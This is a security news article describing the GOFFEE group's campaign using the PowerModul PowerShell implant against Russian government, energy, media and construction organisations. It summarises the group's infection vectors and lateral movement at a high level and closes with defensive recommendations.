GOFFEE Deploys PowerModul in Coordinated Strikes on Government and Energy Networks

The threat actor known as GOFFEE has launched a series of targeted attacks against critical sectors within the Russian Federation, utilizing advanced malware and phishing techniques.

The group’s latest campaign involves the deployment of PowerModul, a PowerShell-based implant, to escalate their intrusion capabilities and carry out coordinated strikes effectively.

PowerModul and Initial Infection Vectors

PowerModul has been identified as a pivotal component in GOFFEE’s latest arsenal, functioning as a downloader capable of fetching and executing additional malicious PowerShell scripts from its command and control (C2) server.

According to the Report, this evolution marks a strategic shift, as the group seeks to maintain persistence and evade detection more effectively.

• RAR Archive Scheme: One of the infection vectors involves a RAR archive file, which contains a patched Windows executable (often explorer.exe or xpsrchvw.exe) masquerading as a document. Upon execution, this file downloads and displays a decoy document to distract the user, while in the background, it drops malicious payloads like PowerModul.

• Microsoft Word Document Scheme: Another approach includes a Microsoft Word document with an embedded macro, which, when enabled, initiates a series of processes leading to the installation of PowerModul. The macro is cleverly hidden through a warning message and requires user interaction to activate, ensuring a higher infection rate.

Execution Flow and Lateral Movement

Upon initial infection, PowerModul’s execution involves several steps:

• Decoy Display: A decoy document is shown to the victim, diverting attention from the malicious activities running concurrently.
• Malware Execution: The malicious process starts by executing shellcode embedded within the patched executable. This code then communicates with GOFFEE’s C2 server to fetch further PowerShell scripts or commands.
• PowerShell Script Execution: PowerModul executes these scripts, potentially downloading secondary implants like PowerTaskel, FlashFileGrabber, or a USB Worm, each designed for distinct purposes such as data theft or network propagation.

• Lateral Movement: To expand its foothold, PowerModul can employ techniques for privilege escalation, using tools like PsExec to run processes with System privileges, thereby facilitating deep lateral movement across the network.

Targeted Sectors and Attribution

The campaign has been particularly aggressive against:

• Media and Telecommunications: Critical for information dissemination and connectivity.
• Construction: Where access to blueprints and facility designs could compromise national security.
• Government Entities: Likely aimed at extracting sensitive government data or disrupting operations.
• Energy Companies: Targeting these could result in significant economic and political disruption.

Given the consistent victimology, the use of PowerTaskel, and the similar infection vectors observed in previous campaigns, security experts attribute these attacks to GOFFEE with high confidence.

The strategic deployment of PowerModul indicates GOFFEE’s intent to sustain long-term presence within targeted networks, potentially for espionage, sabotage, or data theft. Here are some defense strategies:

• Endpoint Protection: Deploy robust endpoint protection solutions capable of detecting and neutralizing PowerShell-based threats.
• User Training: Educate employees on the dangers of enabling content in documents and the importance of scrutinizing email attachments.
• Network Segmentation: Implement network segmentation to limit the lateral movement capabilities of intruding malware.
• Regular Updates: Ensure all systems are up-to-date with the latest security patches to reduce vulnerabilities.
• Active Monitoring: Utilize advanced threat detection tools to continuously monitor for unusual activities, especially PowerShell script executions.

For organizations seeking more information or assistance with incident response, Kaspersky’s threat intelligence team is available at intelreports@kaspersky.com.

Find this News Interesting! Follow us on Google News, LinkedIn, & X to Get Instant Updates!